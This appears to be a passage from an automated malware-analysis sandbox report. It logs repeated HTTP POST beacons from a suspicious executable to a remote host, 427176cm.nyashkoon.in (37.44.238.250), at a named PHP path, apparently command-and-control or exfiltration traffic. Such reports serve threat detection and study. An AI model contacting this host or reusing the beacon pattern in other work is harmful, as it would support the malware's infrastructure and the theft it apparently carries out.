                                        Nov 5, 2024 08:13:25.992337942 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:26.076636076 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:24 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        80 | 192.168.2.7 | 50050 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:26.195377111 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:27.015495062 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:27.092144966 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:25 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        81 | 192.168.2.7 | 50051 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:27.413877964 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:28.232965946 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:28.308279037 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:26 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        82 | 192.168.2.7 | 50052 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:28.428934097 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:29.235582113 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:29.313086987 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:27 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        83 | 192.168.2.7 | 50053 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:29.443396091 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:29.802783012 CET | 1032 | OUT | Data: POST request body


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        84 | 192.168.2.7 | 50054 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:29.949323893 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:30.302525043 CET | 1300 | OUT | Data: POST request body
                                        Nov 5, 2024 08:13:30.769572020 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:30.843775034 CET | 308 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:28 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        85 | 192.168.2.7 | 50055 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:30.147300005 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:30.505727053 CET | 1032 | OUT | Data: POST request body
                                        Nov 5, 2024 08:13:30.967736959 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:31.048032045 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:29 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        86 | 192.168.2.7 | 50056 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:31.180686951 CET | 287 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:13:31.536737919 CET | 1032 | OUT | Data: POST request body
                                        Nov 5, 2024 08:13:32.006922960 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:32.091762066 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:30 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        87 | 192.168.2.7 | 50057 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:32.210735083 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:32.567939043 CET | 1032 | OUT | Data: POST request body
                                        Nov 5, 2024 08:13:33.027956963 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:33.105057001 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:31 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        88 | 192.168.2.7 | 50058 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:33.226041079 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:33.583724976 CET | 1032 | OUT | Data: POST request body
                                        Nov 5, 2024 08:13:34.045192003 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:34.131448030 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:32 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        89 | 192.168.2.7 | 50059 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:34.257230997 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:34.614810944 CET | 1032 | OUT | Data: POST request body
                                        Nov 5, 2024 08:13:35.081940889 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:35.161648989 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:33 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        90 | 192.168.2.7 | 50060 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:35.293849945 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:35.646023989 CET | 1032 | OUT | Data: POST request body


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        91 | 192.168.2.7 | 50061 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:35.855910063 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:36.208554983 CET | 1300 | OUT | Data: POST request body
                                        Nov 5, 2024 08:13:36.675084114 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:36.751876116 CET | 308 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:34 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        92 | 192.168.2.7 | 50062 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:35.979125023 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1028
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:36.333547115 CET | 1028 | OUT | Data: POST request body
                                        Nov 5, 2024 08:13:36.799299955 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:36.886142015 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:34 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        93 | 192.168.2.7 | 50063 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:37.191095114 CET | 287 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:13:37.536709070 CET | 1032 | OUT | Data: POST request body
                                        Nov 5, 2024 08:13:38.003879070 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:38.075443029 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:36 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        94 | 192.168.2.7 | 50064 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:38.208794117 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:38.568958044 CET | 1032 | OUT | Data: POST request body
                                        Nov 5, 2024 08:13:39.028203011 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:39.101356030 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:37 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        95 | 192.168.2.7 | 50065 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:39.225403070 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:39.583678961 CET | 1032 | OUT | Data: POST request body
                                        Nov 5, 2024 08:13:40.046519041 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:40.126075983 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:38 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        96 | 192.168.2.7 | 50066 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:40.255975008 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:40.614942074 CET | 1032 | OUT | Data: POST request body
                                        Nov 5, 2024 08:13:41.076498032 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:41.152506113 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:39 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        97 | 192.168.2.7 | 50067 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:41.483088970 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        98 | 192.168.2.7 | 50068 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:41.761965990 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:42.565625906 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:42.637969971 CET | 308 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:40 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        99 | 192.168.2.7 | 50069 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:41.883176088 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:42.695233107 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:42.769951105 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:40 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        100 | 192.168.2.7 | 50070 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:42.899291039 CET | 287 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:13:43.718949080 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:43.798033953 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:41 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        101 | 192.168.2.7 | 50071 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:43.928463936 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1028
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:44.749017000 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:44.831003904 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:42 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        102 | 192.168.2.7 | 50072 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:44.963987112 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:45.806966066 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:45.885006905 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:43 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        103 | 192.168.2.7 | 50073 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:46.008929968 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:46.818273067 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:46.892985106 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:44 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        104 | 192.168.2.7 | 50074 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:47.026544094 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        105 | 192.168.2.7 | 50075 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:47.660259008 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:49.323996067 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:49.325057983 CET | 308 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:46 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Nov 5, 2024 08:13:49.325149059 CET | 308 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:46 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Nov 5, 2024 08:13:49.325659990 CET | 333 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:49.326236010 CET | 333 | IN | HTTP/1.1 100 Continue


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        106 | 192.168.2.7 | 50076 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:47.776051998 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:49.325160027 CET | 25 | IN | HTTP/1.1 100 Continue
